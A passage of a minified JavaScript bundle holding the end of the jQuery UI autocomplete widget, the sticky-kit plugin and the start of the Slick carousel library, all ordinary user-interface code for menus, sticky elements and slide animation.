t=this.term===this._value(),i=this.menu.element.is(":visible"),r=n.altKey||n.ctrlKey||n.metaKey||n.shiftKey;t&&(!t||i||r)||(this.selectedItem=null,this.search(null,n))},this.options.delay)},search:function(n,t){return n=null!=n?n:this._value(),this.term=this._value(),n.length<this.options.minLength?this.close(t):this._trigger("search",t)!==!1?this._search(n):void 0},_search:function(n){this.pending++;this._addClass("ui-autocomplete-loading");this.cancelSearch=!1;this.source({term:n},this._response())},_response:function(){var t=++this.requestIndex;return n.proxy(function(n){t===this.requestIndex&&this.__response(n);this.pending--;this.pending||this._removeClass("ui-autocomplete-loading")},this)},__response:function(n){n&&(n=this._normalize(n));this._trigger("response",null,{content:n});!this.options.disabled&&n&&n.length&&!this.cancelSearch?(this._suggest(n),this._trigger("open")):this._close()},close:function(n){this.cancelSearch=!0;this._close(n)},_close:function(n){this._off(this.document,"mousedown");this.menu.element.is(":visible")&&(this.menu.element.hide(),this.menu.blur(),this.isNewMenu=!0,this._trigger("close",n))},_change:function(n){this.previous!==this._value()&&this._trigger("change",n,{item:this.selectedItem})},_normalize:function(t){return t.length&&t[0].label&&t[0].value?t:n.map(t,function(t){return"string"==typeof t?{label:t,value:t}:n.extend({},t,{label:t.label||t.value,value:t.value||t.label})})},_suggest:function(t){var i=this.menu.element.empty();this._renderMenu(i,t);this.isNewMenu=!0;this.menu.refresh();i.show();this._resizeMenu();i.position(n.extend({of:this.element},this.options.position));this.options.autoFocus&&this.menu.next();this._on(this.document,{mousedown:"_closeOnClickOutside"})},_resizeMenu:function(){var n=this.menu.element;n.outerWidth(Math.max(n.width("").outerWidth()+1,this.element.outerWidth()))},_renderMenu:function(t,i){var r=this;n.each(i,function(n,i){r._renderItemData(t,i)})},_renderItemData:function(n,t){return this._renderItem(n,t).data("ui-autocomplete-item",t)},_renderItem:function(t,i){return n("<li>").append(n("<div>").text(i.label)).appendTo(t)},_move:function(n,t){return this.menu.element.is(":visible")?this.menu.isFirstItem()&&/^previous/.test(n)||this.menu.isLastItem()&&/^next/.test(n)?(this.isMultiLine||this._value(this.term),this.menu.blur(),void 0):(this.menu[n](t),void 0):(this.search(null,t),void 0)},widget:function(){return this.menu.element},_value:function(){return this.valueMethod.apply(this.element,arguments)},_keyEvent:function(n,t){(!this.isMultiLine||this.menu.element.is(":visible"))&&(this._move(n,t),t.preventDefault())},_isContentEditable:function(n){if(!n.length)return!1;var t=n.prop("contentEditable");return"inherit"===t?this._isContentEditable(n.parent()):"true"===t}});n.extend(n.ui.autocomplete,{escapeRegex:function(n){return n.replace(/[\-\[\]{}()*+?.,\\\^$|#\s]/g,"\\$&")},filter:function(t,i){var r=RegExp(n.ui.autocomplete.escapeRegex(i),"i");return n.grep(t,function(n){return r.test(n.label||n.value||n)})}});n.widget("ui.autocomplete",n.ui.autocomplete,{options:{messages:{noResults:"No search results.",results:function(n){return n+(n>1?" results are":" result is")+" available, use up and down arrow keys to navigate."}}},__response:function(t){var i;this._superApply(arguments);this.options.disabled||this.cancelSearch||(i=t&&t.length?this.options.messages.results(t.length):this.options.messages.noResults,this.liveRegion.children().hide(),n("<div>").text(i).appendTo(this.liveRegion))}});n.ui.autocomplete}),function(){var t,n;t=this.jQuery||window.jQuery;n=t(window);t.fn.stick_in_parent=function(i){var s,e,a,h,c,v,r,u,o,l,f;for(null==i&&(i={}),f=i.sticky_class,c=i.inner_scrolling,l=i.recalc_every,o=i.parent,u=i.offset_top,r=i.spacer,e=i.bottoming,null==u&&(u=0),null==o&&(o=void 0),null==c&&(c=!0),null==f&&(f="is_stuck"),s=t(document),null==e&&(e=!0),a=function(i,h,a,v,y,p,w,b){var it,ot,nt,et,st,k,d,rt,ut,ft,g,tt;if(!i.data("sticky_kit")){if(i.data("sticky_kit",!0),st=s.height(),d=i.parent(),null!=o&&(d=d.closest(o)),!d.length)throw"failed to find stick parent";if(it=nt=!1,(g=null!=r?r&&i.closest(r):t("<div />"))&&g.css("position",i.css("position")),rt=function(){var n,t,e;if(!b&&(st=s.height(),n=parseInt(d.css("border-top-width"),10),t=parseInt(d.css("padding-top"),10),h=parseInt(d.css("padding-bottom"),10),a=d.offset().top+n+t,v=d.height(),nt&&(it=nt=!1,null==r&&(i.insertAfter(g),g.detach()),i.css({position:"",top:"",width:"",bottom:""}).removeClass(f),e=!0),y=i.offset().top-(parseInt(i.css("margin-top"),10)||0)-u,p=i.outerHeight(!0),w=i.css("float"),g&&g.css({width:i.outerWidth(!0),height:p,display:i.css("display"),"vertical-align":i.css("vertical-align"),float:w}),e))return tt()},rt(),p!==v)return et=void 0,k=u,ft=l,tt=function(){var o,ut,t,tt;if(!b&&(t=!1,null!=ft&&(--ft,0>=ft&&(ft=l,rt(),t=!0)),t||s.height()===st||rt(),t=n.scrollTop(),null!=et&&(ut=t-et),et=t,nt?(e&&(tt=t+p+k>v+a,it&&!tt&&(it=!1,i.css({position:"fixed",bottom:"",top:k}).trigger("sticky_kit:unbottom"))),t<y&&(nt=!1,k=u,null==r&&("left"!==w&&"right"!==w||i.insertAfter(g),g.detach()),o={position:"",width:"",top:""},i.css(o).removeClass(f).trigger("sticky_kit:unstick")),c&&(o=n.height(),p+u>o&&!it&&(k-=ut,k=Math.max(o-p,k),k=Math.min(u,k),nt&&i.css({top:k+"px"})))):t>y&&(nt=!0,o={position:"fixed",top:k},o.width="border-box"===i.css("box-sizing")?i.outerWidth()+"px":i.width()+"px",i.css(o).addClass(f),null==r&&(i.after(g),"left"!==w&&"right"!==w||g.append(i)),i.trigger("sticky_kit:stick")),nt&&e&&(null==tt&&(tt=t+p+k>v+a),!it&&tt)))return it=!0,"static"===d.css("position")&&d.css({position:"relative"}),i.css({position:"absolute",bottom:h,top:"auto"}).trigger("sticky_kit:bottom")},ut=function(){return rt(),tt()},ot=function(){return b=!0,n.off("touchmove",tt),n.off("scroll",tt),n.off("resize",ut),t(document.body).off("sticky_kit:recalc",ut),i.off("sticky_kit:detach",ot),i.removeData("sticky_kit"),i.css({position:"",bottom:"",top:"",width:""}),d.position("position",""),nt?(null==r&&("left"!==w&&"right"!==w||i.insertAfter(g),g.remove()),i.removeClass(f)):void 0},n.on("touchmove",tt),n.on("scroll",tt),n.on("resize",ut),t(document.body).on("sticky_kit:recalc",ut),i.on("sticky_kit:detach",ot),setTimeout(tt,0)}},h=0,v=this.length;h<v;h++)i=this[h],a(t(i));return this}}.call(this);!function(n){"use strict";"function"==typeof define&&define.amd?define(["jquery"],n):"undefined"!=typeof exports?module.exports=n(require("jquery")):n(jQuery)}(function(n){"use strict";var t=window.Slick||{};(t=function(){var t=0;return function(i,r){var f,u=this;u.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:n(i),appendDots:n(i),arrows:!0,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous<\/button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next<\/button>',autoplay:!1,autoplaySpeed:3e3,centerMode:!1,centerPadding:"50px",cssEase:"ease",customPaging:function(t,i){return n('<button type="button" />').text(i+1)},dots:!1,dotsClass:"slick-dots",draggable:!0,easing:"linear",edgeFriction:.35,fade:!1,focusOnSelect:!1,focusOnChange:!1,infinite:!0,initialSlide:0,lazyLoad:"ondemand",mobileFirst:!1,pauseOnHover:!0,pauseOnFocus:!0,pauseOnDotsHover:!1,respondTo:"window",responsive:null,rows:1,rtl:!1,slide:"",slidesPerRow:1,slidesToShow:1,slidesToScroll:1,speed:500,swipe:!0,swipeToSlide:!1,touchMove:!0,touchThreshold:5,useCSS:!0,useTransform:!0,variableWidth:!1,vertical:!1,verticalSwiping:!1,waitForAnimate:!0,zIndex:1e3};u.initials={animating:!1,dragging:!1,autoPlayTimer:null,currentDirection:0,currentLeft:null,currentSlide:0,direction:1,$dots:null,listWidth:null,listHeight:null,loadIndex:0,$nextArrow:null,$prevArrow:null,scrolling:!1,slideCount:null,slideWidth:null,$slideTrack:null,$slides:null,sliding:!1,slideOffset:0,swipeLeft:null,swiping:!1,$list:null,touchObject:{},transformsEnabled:!1,unslicked:!1};n.extend(u,u.initials);u.activeBreakpoint=null;u.animType=null;u.animProp=null;u.breakpoints=[];u.breakpointSettings=[];u.cssTransitions=!1;u.focussed=!1;u.interrupted=!1;u.hidden="hidden";u.paused=!0;u.positionProp=null;u.respondTo=null;u.rowCount=1;u.shouldClick=!0;u.$slider=n(i);u.$slidesCache=null;u.transformType=null;u.transitionType=null;u.visibilityChange="visibilitychange";u.windowWidth=0;u.windowTimer=null;f=n(i).data("slick")||{};u.options=n.extend({},u.defaults,r,f);u.currentSlide=u.options.initialSlide;u.originalSettings=u.options;void 0!==document.mozHidden?(u.hidden="mozHidden",u.visibilityChange="mozvisibilitychange"):void 0!==document.webkitHidden&&(u.hidden="webkitHidden",u.visibilityChange="webkitvisibilitychange");u.autoPlay=n.proxy(u.autoPlay,u);u.autoPlayClear=n.proxy(u.autoPlayClear,u);u.autoPlayIterator=n.proxy(u.autoPlayIterator,u);u.changeSlide=n.proxy(u.changeSlide,u);u.clickHandler=n.proxy(u.clickHandler,u);u.selectHandler=n.proxy(u.selectHandler,u);u.setPosition=n.proxy(u.setPosition,u);u.swipeHandler=n.proxy(u.swipeHandler,u);u.dragHandler=n.proxy(u.dragHandler,u);u.keyHandler=n.proxy(u.keyHandler,u);u.instanceUid=t++;u.htmlExpr=/^(?:\s*(<[\w\W]+>)[^>]*)$/;u.registerBreakpoints();u.init(!0)}}()).prototype.activateADA=function(){this.$slideTrack.find(".slick-active").attr({"aria-hidden":"false"}).find("a, input, button, select").attr({tabindex:"0"})};t.prototype.addSlide=t.prototype.slickAdd=function(t,i,r){var u=this;if("boolean"==typeof i)r=i,i=null;else if(i<0||i>=u.slideCount)return!1;u.unload();"number"==typeof i?0===i&&0===u.$slides.length?n(t).appendTo(u.$slideTrack):r?n(t).insertBefore(u.$slides.eq(i)):n(t).insertAfter(u.$slides.eq(i)):!0===r?n(t).prependTo(u.$slideTrack):n(t).appendTo(u.$slideTrack);u.$slides=u.$slideTrack.children(this.options.slide);u.$slideTrack.children(this.options.slide).detach();u.$slideTrack.append(u.$slides);u.$slides.each(function(t,i){n(i).attr("data-slick-index",t)});u.$slidesCache=u.$slides;u.reinit()};t.prototype.animateHeight=function(){var n=this,t;1===n.options.slidesToShow&&!0===n.options.adaptiveHeight&&!1===n.options.vertical&&(t=n.$slides.eq(n.currentSlide).outerHeight(!0),n.$list.animate({height:t},n.options.speed))};t.prototype.animateSlide=function(t,i){var u={},r=this;r.animateHeight();!0===r.options.rtl&&!1===r.options.vertical&&(t=-t);!1===r.transformsEnabled?!1===r.options.vertical?r.$slideTrack.animate({left:t},r.options.speed,r.options.easing,i):r.$slideTrack.animate({top:t},r.options.speed,r.options.easing,i):!1===r.cssTransitions?(!0===r.options.rtl&&(r.currentLeft=-r.currentLeft),n({animStart:r.currentLeft}).animate({animStart:t},{duration:r.options.speed,easing:r.options.easing,step:function(n){n=Math.ceil(n);!1===r.options.vertical?(u[r.animType]="translate("+n+"px, 0px)",r.$slideTrack.css(u)):(u[r.animType]="translate(0px,"+n+"px)",r.$slideTrack.css(u))},complete:function(){i&&i.call()}})):(r.applyTransition(),t=Math.ceil(t),u[r.animType]=!1===r.options.vertical?"translate3d("+t+"px, 0px, 0px)":"translate3d(0px,"+t+"px, 0px)",r.$slideTrack.css(u),i&&setTimeout(function(){r.disableTransition();i.call()},r.options.speed))};t.prototype.getNavTarget=function(){var i=this,t=i.options.asNavFor;return t&&null!==t&&(t=n(t).not(i.$slider)),t};t.prototype.asNavFor=function(t){var i=this.getNavTarget();null!==i&&"object"==typeof i&&i.each(function(){var i=n(this).slick("getSlick");i.unslicked||i.slideHandler(t,!0)})};t.prototype.applyTransition=function(n){var t=this,i={};i[t.transitionType]=!1===t.options.fade?t.transformType+" "+t.options.speed+"ms "+t.options.cssEase:"opacity "+t.options.speed+"ms "+t.options.cssEase;!1===t.options.fade?t.$slideTrack.css(i):t.$slides.eq(n).css(i)};t.prototype.autoPlay=function(){var n=this;n.autoPlayClear();n.slideCount>n.options.slidesToShow&&(n.autoPlayTimer=setInterval(n.autoPlayIterator,n.options.autoplaySpeed))};t.prototype.autoPlayClear=function(){var n=this;n.autoPlayTimer&&clearInterval(n.autoPlayTimer)};t.prototype.autoPlayIterator=function(){var n=this,t=n.currentSlide+n.options.slidesToScroll;n.paused||n.interrupted||n.focussed||(!1===n.options.infinite&&(1===n.direction&&n.currentSlide+1===n.slideCount-1?n.direction=0:0===n.direction&&(t=n.currentSlide-n.options.slidesToScroll,n.currentSlide-1==0&&(n.direction=1))),n.slideHandler(t))};t.prototype.buildArrows=function(){var t=this;!0===t.options.arrows&&(t.$prevArrow=n(t.options.prevArrow).addClass("slick-arrow"),t.$nextArrow=n(t.options.nextArrow).addClass("slick-arrow"),t.slideCount>t.options.slidesToShow?(t.$prevArrow.removeClass("slick-hidden").removeAttr("aria-hidden tabindex"),t.$nextArrow.removeClass("slick-hidden").removeAttr("aria-hidden tabindex"),t.htmlExpr.test(t.options.prevArrow)&&t.$prevArrow.prependTo(t.options.appendArrows),t.htmlExpr.test(t.options.nextArrow)&&t.$nextArrow.appendTo(t.options.appendArrows),!0!==t.options.infinite&&t.$prevArrow.addClass("slick-disabled").attr("aria-disabled","true")):t.$prevArrow.add(t.$nextArrow).addClass("slick-hidden").attr({"aria-disabled":"true",tabindex:"-1"}))};t.prototype.buildDots=function(){var i,r,t=this;if(!0===t.options.dots){for(t.$slider.addClass("slick-dotted"),r=n("<ul />").addClass(t.options.dotsClass),i=0;i<=t.getDotCount();i+=1)r.append(n("<li />").append(t.options.customPaging.call(this,t,i)));t.$dots=r.appendTo(t.options.appendDots);t.$dots.find("li").first().addClass("slick-active")}};t.prototype.buildOut=function(){var t=this;t.$slides=t.$slider.children(t.options.slide+":not(.slick-cloned)").addClass("slick-slide");t.slideCount=t.$slides.length;t.$slides.each(function(t,i){n(i).attr("data-slick-index",t).data("originalStyling",n(i).attr("style")||"")});t.$slider.addClass("slick-slider");t.$slideTrack=0===t.slideCount?n('<div class="slick-track"/>').appendTo(t.$slider):t.$slides.wrapAll('<div class="slick-track"/>').parent();t.$list=t.$slideTrack.wrap('<div class="slick-list"/>').parent();t.$slideTrack.css("opacity",0);!0!==t.options.centerMode&&!0!==t.options.swipeToSlide||(t.options.slidesToScroll=1);n("img[data-lazy]",t.$slider).not("[src]").addClass("slick-loading");t.setupInfinite();t.buildArrows();t.buildDots();t.updateDots();t.setSlideClasses("number"==typeof t.currentSlide?t.currentSlide:0);!0===t.options.draggable&&t.$list.addClass("draggable")};t.prototype.buildRows=function(){var t,i,r,f,c,u,e,n=this,o,s,h;if(f=document.createDocumentFragment(),u=n.$slider.children(),n.options.rows>1){for(e=n.options.slidesPerRow*n.options.rows,c=Math.ceil(u.length/e),t=0;t<c;t++){for(o=document.createElement("div"),i=0;i<n.options.rows;i++){for(s=document.createElement("div"),r=0;r<n.options.slidesPerRow;r++)h=t*e+(i*n.options.slidesPerRow+r),u.get(h)&&s.appendChild(u.get(h));o.appendChild(s)}f.appendChild(o)}n.$slider.empty().append(f);n.$slider.children().children().children().css({width:100/n.options.slidesPerRow+"%",display:"inline-block"})}};t.prototype.checkResponsive=function(t,i){var f,u,e,r=this,o=!1,s=r.$slider.width(),h=window.innerWidth||n(window).width();if("window"===r.respondTo?e=h:"slider"===r.respondTo?e=s:"min"===r.respondTo&&(e=Math.min(h,s)),r.options.responsive&&r.options.responsive.length&&null!==r.options.responsive){u=null;for(f in r.breakpoints)r.breakpoints.hasOwnProperty(f)&&(!1===r.originalSettings.mobileFirst?e<r.breakpoints[f]&&(u=r.breakpoints[f]):e>r.breakpoints[f]&&(u=r.breakpoints[f]));null!==u?null!==r.activeBreakpoint?(u!==r.activeBreakpoint||i)&&(r.activeBreakpoint=u,"unslick"===r.breakpointSettings[u]?r.unslick(u):(r.options=n.extend({},r.originalSettings,r.breakpointSettings[u]),!0===t&&(r.currentSlide=r.options.initialSlide),r.refresh(t)),o=u):(r.activeBreakpoint=u,"unslick"===r.breakpointSettings[u]?r.unslick(u):(r.options=n.extend({},r.originalSettings,r.breakpointSettings[u]),!0===t&&(r.currentSlide=r.options.initialSlide),r.refresh(t)),o=u):null!==r.activeBreakpoint&&(r.activeBreakpoint=null,r.options=r.originalSettings,!0===t&&(r.currentSlide=r.options.initialSlide),r.refresh(t),o=u);t||!1===o||r.$slider.trigger("breakpoint",[r,o])}};t.prototype.changeSlide=function(t,i){var f,e,o,r=this,u=n(t.currentTarget),s;switch(u.is("a")&&t.preventDefault(),u.is("li")||(u=u.closest("li")),o=r.slideCount%r.options.slidesToScroll!=0,f=o?0:(r.slideCount-r.currentSlide)%r.options.slidesToScroll,t.data.message){case"previous":e=0===f?r.options.slidesToScroll:r.options.slidesToShow-f;r.slideCount>r.options.slidesToShow&&r.slideHandler(r.currentSlide-e,!1,i);break;case"next":e=0===f?r.options.slidesToScroll:f;r.slideCount>r.options.slidesToShow&&r.slideHandler(r.currentSlide+e,!1,i);break;case"index":s=0===t.data.index?0:t.data.index||u.index()*r.options.slidesToScroll;r.slideHandler(r.checkNavigable(s),!1,i);u.children().trigger("focus");break;default:return}};t.prototype.checkNavigable=function(n){var t,i,r;if(t=this.getNavigableIndexes(),i=0,n>t[t.length-1])n=t[t.length-1];else for(r in t){if(n<t[r]){n=i;break}i=t[r]}return n};t.prototype.cleanUpEvents=function(){var t=this;t.options.dots&&null!==t.$dots&&(n("li",t.$dots).off("click.slick",t.changeSlide).off("mouseenter.slick",n.proxy(t.interrupt,t,!0)).off("mouseleave.slick",n.proxy(t.interrupt,t,!1)),!0===t.options.accessibility&&t.$dots.off("keydown.slick",t.keyHandler));t.$slider.off("focus.slick blur.slick");!0===t.options.arrows&&t.slideCount>t.options.slidesToShow&&(t.$prevArrow&&t.$prevArrow.off("click.slick",t.changeSlide),t.$nextArrow&&t.$nextArrow.off("click.slick",t.changeSlide),!0===t.options.accessibility&&(t.$prevArrow&&t.$prevArrow.off("keydown.slick",t.keyHandler),t.$nextArrow&&t.$nextArrow.off("keydown.slick",t.keyHandler)));t.$list.off("touchstart.slick mousedown.slick",t.swipeHandler);t.$list.off("touchmove.slick mousemove.slick",t.swipeHandler);t.$list.off("touchend.slick mouseup.slick",t.swipeHandler);t.$list.off("touchcancel.slick mouseleave.slick",t.swipeHandler);t.$list.off("click.slick",t.clickHandler);n(document).off(t.visibilityChange,t.visibility);t.cleanUpSlideEvents();!0===t.options.accessibility&&t.$list.off("keydown.slick",t.keyHandler);!0===t.options.focusOnSelect&&n(t.$slideTrack).children().off("click.slick",t.selectHandler);n(window).off("orientationchange.slick.slick-"+t.instanceUid,t.orientationChange);n(window).off("resize.slick.slick-"+t.instanceUid,t.resize);n("[draggable!=true]",t.$slideTrack).off("dragstart",t.preventDefault);n(window).off("load.slick.slick-"+t.instanceUid,t.setPosition)};t.prototype.cleanUpSlideEvents=function(){var t=this;t.$list.off("mouseenter.slick",n.proxy(t.interrupt,t,!0));t.$list.off("mouseleave.slick",n.proxy(t.interrupt,t,!1))};t.prototype.cleanUpRows=function(){var t,n=this;n.options.rows>1&&((t=n.$slides.children().children()).removeAttr("style"),n.$slider.empty().append(t))};t.prototype.clickHandler=function(n){!1===this.shouldClick&&(n.stopImmediatePropagation(),n.stopPropagation(),n.preventDefault())};t.prototype.destroy=function(t){var i=this;i.autoPlayClear();i.touchObject={};i.cleanUpEvents();n(".slick-cloned",i.$slider).detach();i.$dots&&i.$dots.remove();i.$prevArrow&&i.$prevArrow.length&&(i.$prevArrow.removeClass("slick-disabled slick-arrow slick-hidden").removeAttr("aria-hidden aria-disabled tabindex").css("display",""),i.htmlExpr.test(i.options.prevArrow)&&i.$prevArrow.remove());i.$nextArrow&&i.$nextArrow.length&&(i.$nextArrow.removeClass("slick-disabled slick-arrow slick-hidden").removeAttr("aria-hidden aria-disabled tabindex").css("display",""),i.htmlExpr.test(i.options.nextArrow)&&i.$nextArrow.remove());i.$slides&&(i.$slides.removeClass("slick-slide slick-active slick-center slick-visible slick-current").removeAttr("aria-hidden").removeAttr("data-slick-index").each(function(){n(this).attr("style",n(this).data("originalStyling"))}),i.$slideTrack.children(this.options.slide).detach(),i.$slideTrack.detach(),i.$list.detach(),i.$slider.append(i.$slides));i.cleanUpRows();i.$slider.removeClass("slick-slider");i.$slider.removeClass("slick-initialized");i.$slider.removeClass("slick-dotted");i.unslicked=!0;t||i.$slider.trigger("destroy",[i])};t.prototype.disableTransition=function(n){var t=this,i={};i[t.transitionType]="";!1===t.options.fade?t.$slideTrack.css(i):t.$slides.eq(n).css(i)};t.prototype.fadeSlide=function(n,t){var i=this;!1===i.cssTransitions?(i.$slides.eq(n).css({zIndex:i.options.zIndex}),i.$slides.eq(n).animate({opacity:1},i.options.speed,i.options.easing,t)):(i.applyTransition(n),i.$slides.eq(n).css({opacity:1,zIndex:i.options.zIndex}),t&&setTimeout(function(){i.disableTransition(n);t.call()},i.options.speed))};t.prototype.fadeSlideOut=function(n){var t=this;!1===t.cssTransitions?t.$slides.eq(n).animate({opacity:0,zIndex:t.options.zIndex-2},t.options.speed,t.options.easing):(t.applyTransition(n),t.$slides.eq(n).css({opacity:0,zIndex:t.options.zIndex-2}))};t.prototype.filterSlides=t.prototype.slickFilter=function(n){var t=this;null!==n&&(t.$slidesCache=t.$slides,t.unload(),t.$slideTrack.children(this.options.slide).detach(),t.$slidesCache.filter(n).appendTo(t.$slideTrack),t.reinit())};t.prototype.focusHandler=function(){var t=this;t.$slider.off("focus.slick blur.slick").on("focus.slick blur.slick","*",function(i){i.stopImmediatePropagation();var r=n(this);setTimeout(function(){t.options.pauseOnFocus&&(t.focussed=r.is(":focus"),t.autoPlay())},0)})};t.prototype.getCurrent=t.prototype.slickCurrentSlide=function(){return this.currentSlide};t.prototype.getDotCount=function(){var n=this,i=0,r=0,t=0;if(!0===n.options.infinite)if(n.slideCount<=n.options.slidesToShow)++t;else for(;i<n.slideCount;)++t,i=r+n.options.slidesToScroll,r+=n.options.slidesToScroll<=n.options.slidesToShow?n.options.slidesToScroll:n.options.slidesToShow;else if(!0===n.options.centerMode)t=n.slideCount;else if(n.options.asNavFor)for(;i<n.slideCount;)++t,i=r+n.options.slidesToScroll,r+=n.options.slidesToScroll<=n.options.slidesToShow?n.options.slidesToScroll:n.options.slidesToShow;else t=1+Math.ceil((n.slideCount-n.options.slidesToShow)/n.options.slidesToScroll);return t-1};t.prototype.getLeft=function(n){var f,r,i,e,t=this,u=0;return t.slideOffset=0,r=t.$slides.first().outerHeight(!0),!0===t.options.infinite?(t.slideCount>t.options.slidesToShow&&(t.slideOffset=t.slideWidth*t.options.slidesToShow*-1,e=-1,!0===t.options.vertical&&!0===t.options.centerMode&&(2===t.options.slidesToShow?e=-1.5:1===t.options.slidesToShow&&(e=-2)),u=r*t.options.slidesToShow*e),t.slideCount%t.options.slidesToScroll!=0&&n+t.options.slidesToScroll>t.slideCount&&t.slideCount>t.options.slidesToShow&&(n>t.slideCount?(t.slideOffset=(t.options.slidesToShow-(n-t.slideCount))*t.slideWidth*-1,u=(t.options.slidesToShow-(n-t.slideCount))*r*-1):(t.slideOffset=t.slideCount%t.options.slidesToScroll*t.slideWidth*-1,u=t.slideCount%t.options.slidesToScroll*r*-1))):n+t.options.slidesToShow>t.slideCount&&(t.slideOffset=(n+t.options.slidesToShow-t.slideCount)*t.slideWidth,u=(n+t.options.slidesToShow-t.slideCount)*r),t.slideCount<=t.options.slidesToShow&&(t.slideOffset=0,u=0),!0===t.options.centerMode&&t.slideCount<=t.options.slidesToShow?t.slideOffset=t.slideWidth*Math.floor(t.options.slidesToShow)/2-t.slideWidth*t.slideCount/2:!0===t.options.centerMode&&!0===t.options.infinite?t.slideOffset+=t.slideWidth*Math.floor(t.options.slidesToShow/2)-t.slideWidth:!0===t.options.centerMode&&(t.slideOffset=0,t.slideOffset+=t.slideWidth*Math.floor(t.options.slidesToShow/2)),f=!1===t.options.vertical?n*t.slideWidth*-1+t.slideOffset:n*r*-1+u,!0===t.options.variableWidth&&(i=t.slideCount<=t.options.slidesToShow||!1===t.options.infinite?t.$slideTrack.children(".slick-slide").eq(n):t.$slideTrack.children(".slick-slide").eq(n+t.options.slidesToShow),f=!0===t.options.rtl?i[0]?-1*(t.$slideTrack.width()-i[0].offsetLeft-i.width()):0:i[0]?-1*i[0].offsetLeft:0,!0===t.options.centerMode&&(i=t.slideCount<=t.options.slidesToShow||!1===t.options.infinite?t.$slideTrack.children(".slick-slide").eq(n):t.$slideTrack.children(".slick-slide").eq(n+t.options.slidesToShow+1),f=!0===t.options.rtl?i[0]?-1*(t.$slideTrack.width()-i[0].offsetLeft-i.width()):0:i[0]?-1*i[0].offsetLeft:0,f+=(t.$list.width()-i.outerWidth())/2)),f};t.prototype.getOption=t.prototype.slickGetOption=function(n){return this.options[n]};t.prototype.getNavigableIndexes=function(){var i,n=this,t=0,r=0,u=[];for(!1===n.options.infinite?i=n.slideCount:(t=-1*n.options.slidesToScroll,r=-1*n.options.slidesToScroll,i=2*n.slideCount);t<i;)u.push(t),t=r+n.options.slidesToScroll,r+=n.options.slidesToScroll<=n.options.slidesToShow?n.options.slidesToScroll:n.options.slidesToShow;return u};t.prototype.getSlick=function(){return this};t.prototype.getSlideCount=function(){var i,r,t=this;return r=!0===t.options.centerMode?t.slideWidth*Math.floor(t.options.slidesToShow/2):0,!0===t.options.swipeToSlide?(t.$slideTrack.find(".slick-slide").each(function(u,f){if(f.offsetLeft-r+n(f).outerWidth()/2>-1*t.swipeLeft)return i=f,!1}),Math.abs(n(i).attr("data-slick-index")-t.currentSlide)||1):t.options.slidesToScroll};t.prototype.goTo=t.prototype.slickGoTo=function(n,t){this.changeSlide({data:{message:"index",index:parseInt(n)}},t)};t.prototype.init=function(t){var i=this;n(i.$slider).hasClass("slick-initialized")||(n(i.$slider).addClass("slick-initialized"),i.buildRows(),i.buildOut(),i.setProps(),i.startLoad(),i.loadSlider(),i.initializeEvents(),i.updateArrows(),i.updateDots(),i.checkResponsive(!0),i.focusHandler());t&&i.$slider.trigger("init",[i]);!0===i.options.accessibility&&i.initADA();i.options.autoplay&&(i.paused=!1,i.autoPlay())};t.prototype.initADA=function(){var t=this,f=Math.ceil(t.slideCount/t.options.slidesToShow),r=t.getNavigableIndexes().filter(function(n){return n>=0&&n<t.slideCount}),i,u;for(t.$slides.add(t.$slideTrack.find(".slick-cloned")).attr({"aria-hidden":"true",tabindex:"-1"}).find("a, input, button, select").attr({tabindex:"-1"}),null!==t.$dots&&(t.$slides.not(t.$slideTrack.find(".slick-cloned")).each(function(i){var u=r.indexOf(i);n(this).attr({role:"tabpanel",id:"slick-slide"+t.instanceUid+i,tabindex:-1});-1!==u&&n(this).attr({"aria-describedby":"slick-slide-control"+t.instanceUid+u})}),t.$dots.attr("role","tablist").find("li").each(function(i){var u=r[i];n(this).attr({role:"presentation"});n(this).find("button").first().attr({role:"tab",id:"slick-slide-control"+t.instanceUid+i,"aria-controls":"slick-slide"+t.instanceUid+u,"aria-label":i+1+" of "+f,"aria-selected":null,tabindex:"-1"})}).eq(t.currentSlide).find("button").attr({"aria-selected":"true",tabindex:"0"}).end()),i=t.currentSlide,u=i+t.options.slidesToShow;i<u;i++)t.$slides.eq(i).attr("tabindex",0);t.activateADA()};t.prototype.initArrowEvents=function(){var n=this;!0===n.options.arrows&&n.slideCount>n.options.slidesToShow&&(n.$prevArrow.off("click.slick").on("click.slick",{message:"previous"},n.changeSlide),n.$nextArrow.off("click.slick").on("click.slick",{message:"next"},n.changeSlide),!0===n.options.accessibility&&(n.$prevArrow.on("keydown.slick",n.keyHandler),n.$nextArrow.on("keydown.slick",n.keyHandler)))};t.prototype.initDotEvents=function(){var t=this;!0===t.options.dots&&(n("li",t.$dots).on("click.slick",{message:"index"},t.changeSlide),!0===t.options.accessibility&&t.$dots.on("keydown.slick",t.keyHandler));!0===t.options.dots&&!0===t.options.pauseOnDotsHover&&n("li",t.$dots).on("mouseenter.slick",n.proxy(t.interrupt,t,!0)).on("mouseleave.slick",n.proxy(t.interrupt,t,!1))};t.prototype.initSlideEvents=function(){var t=this;t.options.pauseOnHover&&(t.$list.on("mouseenter.slick",n.proxy(t.interrupt,t,!0)),t.$list.on("mouseleave.slick",n.proxy(t.interrupt,t,!1)))};t.prototype.initializeEvents=function(){var t=this;t.initArrowEvents();t.initDotEvents();t.initSlideEvents();t.$list.on("touchstart.slick mousedown.slick",{action:"start"},t.swipeHandler);t.$list.on("touchmove.slick mousemove.slick",{action:"move"},t.swipeHandler);t.$list.on("touchend.slick mouseup.slick",{action:"end"},t.swipeHandler);t.$list.on("touchcancel.slick mouseleave.slick",{action:"end"},t.swipeHandler);t.$list.on("click.slick",t.clickHandler);n(document).on(t.visibilityChange,n.proxy(t.visibility,t));!0===t.options.accessibility&&t.$list.on("keydown.slick",t.keyHandler);!0===t.options.focusOnSelect&&n(t.$slideTrack).children().on("click.slick",t.selectHandler);n(window).on("orientationchange.slick.slick-"+t.instanceUid,n.proxy(t.orientationChange,t));n(window).on("resize.slick.slick-"+t.instanceUid,n.proxy(t.resize,t));n("[draggable!=true]",t.$slideTrack).on("dragstart",t.preventDefault);n(window).on("load.slick.slick-"+t.instanceUid,t.setPosition);n(t.setPosition)};t.prototype.initUI=function(){var n=this;!0===n.options.arrows&&n.slideCount>n.options.slidesToShow&&(n.$prevArrow.show(),n.$nextArrow.show());!0===n.options.dots&&n.slideCount>n.options.slidesToShow&&n.$dots.show()};t.prototype.keyHandler=function(n){var 